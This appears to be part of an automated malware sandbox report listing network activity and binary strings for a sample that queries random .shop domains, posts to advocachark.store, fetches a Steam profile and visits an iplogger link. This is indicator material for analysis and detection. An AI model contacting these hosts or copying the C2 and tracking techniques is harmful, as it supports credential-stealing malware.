    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: GET /1KhnJ4 HTTP/1.1Host: iplogger.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1KhnJ4 HTTP/1.1Host: iplogger.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8ccd8274b9e442c9 HTTP/1.1Host: iplogger.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iplogger.com/1KhnJ4?__cf_chl_rt_tk=uzgDrbo7G9tR40KRb5FXyZ9uJF.2cqXfIjT9C.Swxlo-1727964562-0.0.1.1-5246Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://iplogger.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8ccd8274b9e442c9 HTTP/1.1Host: iplogger.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.com/1KhnJ4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4 HTTP/1.1Host: iplogger.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccd8289bc184228/1727964569365/186f8d6e14d4fe0eb3804fd1be46d1535ddfe35c7ad2d6cb8e9dce82775fb104/hz5T_VEh25F25lZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficDNS traffic detected: DNS query: branchtriviawlek.shop
    Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
    Source: global trafficDNS traffic detected: DNS query: defenddsouneuw.shop
    Source: global trafficDNS traffic detected: DNS query: deallyharvenw.shop
    Source: global trafficDNS traffic detected: DNS query: priooozekw.shop
    Source: global trafficDNS traffic detected: DNS query: pumpkinkwquo.shop
    Source: global trafficDNS traffic detected: DNS query: abortinoiwiam.shop
    Source: global trafficDNS traffic detected: DNS query: surroundeocw.shop
    Source: global trafficDNS traffic detected: DNS query: covvercilverow.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: advocachark.store
    Source: global trafficDNS traffic detected: DNS query: iplogger.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 03 Oct 2024 14:09:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 03 Oct 2024 14:09:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 14:09:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 9YAxSII5M+ZAtE8iVLmbHaqnKrSzBArxjt8=$h6/2OtBz6jJ2qovuReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PL11DEF35axLvu1e4nXFHkYZwCyzHamE15DPr%2B97hhyZDFnMfT1gKdsriaOL12CqmHw4oPC9DGjmeGh7yQGQdui%2B1jdBZvv5sT54PrrKEfbgS8VMFc7ig56pfI1Ls14%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ccd828e6ebb78db-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 14:09:30 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: CzgMDO/BwEel+DB7nEC3Dd3/PfMfGjf1dhE=$Jtb4oHRz4NtbQo4yServer: cloudflareCF-RAY: 8ccd82a55cd00f8b-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 14:09:33 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: QOiLYE8wEsp0SwUdMc704Xr/gSsNVTUxfP4=$G+0B1Zllu6rs3cVRcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ccd82bad9ff43be-EWR
    Source: DWrite.dllString found in binary or memory: http://.css
    Source: DWrite.dllString found in binary or memory: http://.jpg
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: dxcompiler.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: dxcompiler.dllString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: DragExt64.dllString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.0
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.1
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.2
    Source: DWrite.dllString found in binary or memory: http://html4/loose.dtd
    Source: dxcompiler.dllString found in binary or memory: http://khr.io/hlsl2spirv#optimization)
    Source: dxcompiler.dllString found in binary or memory: http://khr.io/hlsl2spirv#optimization)OdumpPrint
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://ocsp.digicert.com0
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://ocsp.digicert.com0A
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://ocsp.digicert.com0C
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://ocsp.digicert.com0X
    Source: n3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drString found in binary or memory: http://scripts.sil.org/OFL
    Source: n3.exe.0.drString found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: n3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drString found in binary or memory: http://www.ascendercorp.com/
    Source: n3.exe.0.drString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht
    Source: n3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
    Source: n3.exe, 00000002.00000002.2284662032.0000000002484000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
    Source: DragExt64.dll, dxcompiler.dllString found in binary or memory: http://www.digicert.com/CPS0
    Source: n3.exe, 00000002.00000002.2284662032.0000000002502000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.2
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.3/exr
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/kml/2.2
    Source: n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.topografix.com/GPX/1/1
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
